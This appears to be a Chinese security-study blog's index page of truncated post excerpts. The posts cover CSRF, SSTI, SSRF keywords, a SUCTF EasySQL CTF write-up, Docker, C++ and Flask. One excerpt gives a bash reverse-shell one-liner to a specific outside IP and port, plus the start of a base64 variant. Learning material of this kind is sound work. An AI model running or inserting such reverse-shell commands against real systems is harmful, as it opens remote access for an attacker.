1.5k1 分钟

CSRF 跨站请求伪造,与 XSS 不同,XSS 是利用站内信任用户而 CSRF 是伪装信任用户(当网站使用 cookie 标明身份时,在用户没有登出该网站的情况下访问其他危险网站,危险网站使用其在该网站上的 cookie 伪装成用户发起请求)。 所以前提是:本地生成 Cookie, 不登出就访问危险网站 # GET 例子: # POST 大多 CSRF 用的都是 <img>,<iframe>,<script > 这种带 src 属性的标签,这类标签只能发出一次 GET 请求。 所以如果是使用 POST 方法进行传参的网站: 在后端的参数是_$REQUES
8.6k8 分钟

SSTI (服务器端模板注入,Server-Side Template Injection) 由于不知道哪里的 bug,查看图片需要在检查中手动把 data-src 改成 src # 介绍 漏洞成因是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。 凡是使用模板的地方都可能会出现 SSTI 的问题,这不是模版引擎导致的问题。 以 PHP 模版引擎 Twig 为例: <?php  require_once dirna
8911 分钟

# 反弹 shell bash: bash -i >& /dev/tcp/118.31.3.26/10086 0>&1//-i 表示交互模式,>&将标准输出以及错误重定向,/dev...是使用特殊文件进行tcp连接,0>&1是将标准输入重定向。注意:0是标准输入,1是标准输出,2是标准错误。>&是组合操作符,同时操作标准输出和错误,也可以指定。base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3Rjc
13k12 分钟

# [SUCTF 2019]EasySQL buu 上的,百度下有题解,这里说点有趣的 关于最后 payload 还有查询语句: select $_GET['query'] || flag from Flag //这道题最核心的就是猜出这个语句来 这里的 II 应该是逻辑或,当使用任意一个数字(常数列)与其或时,返回的只会是常数列。所以 payload 是 *,任意数字 ,因为 *||flag 是非法的,即使是开启了所谓的字符串拼接也是不对的。 但是似乎这道题其实没有开字符串拼接,输入 *,1 返回的是: Array ( [0] =>
1971 分钟

抽象,这商家甚至还说要顺网线来找,从没见过这么离谱的商家,没理也要急。 看了一眼评论,算我买的时候走眼了(pdd 申诉通过了,退回来了,不过看到就来气,打算改天销了。)。
3.9k4 分钟

# 正文 可以从 URL 关键字中寻找漏洞 share 通常表示分享功能 wap 表示这是针对移动设备优化的版本 url 通常用于重定向 link 获取某个东西 src 就是 src source 指定数据来源 target 用于指定表单提交后用于处理的文件 u url 的简写 display 控制图片显示方式 sourceURL 待下载文件的地址 imageURL 指定页面显示的图片的地址 domain 后跟域名 产生漏洞的函数 PHP file_get_contents() -- 支持 php://input 协议
2.7k2 分钟

# 命令 -d :后台运行容器,例如 docker run -d ubuntu 。 -it :以交互式终端运行容器,例如 docker exec -it container_name bash 。 -t :为镜像指定标签,例如 docker build -t my-image . 。 # 架构 # Client 常用命令: run (运行容器), ps (正在运行的容器), bulid (构建镜像) exec (在容器中执行命令) # Daemon Docker 守护进程(通常是 dockerd ) 监听来自 Docker 客户端的请求,并且通过 Dock
11k10 分钟

# 一点疑惑 # 1.this 指针 (选 B) A. 构造函数用于初始化对象,在构造函数中可以使用 this 指针来区分成员变量和局部变量,或者通过 this 指针调用其他成员函数等。例如: class MyClass {public: int num; MyClass(int num) { this->num = num; // 用于区分时必须明写 this }};B. 此时 this 指针是一个指向常量对象的指针,即 const 类型的指针,不能指向可以被修改的对象 c
15k14 分钟

这是个 python 的库 安装: pip install Flask from flask import Flask //导入flask类app = Flask(__name__) //创建实例‘app’,__name__是特殊变量,直接执行是__main__,被导入时模块名//用来Flask是构造函数,传递这个变量是为了让Flask应用能找到这个文件@app.route('/') //装饰器,里面那个是url,'/'就是指网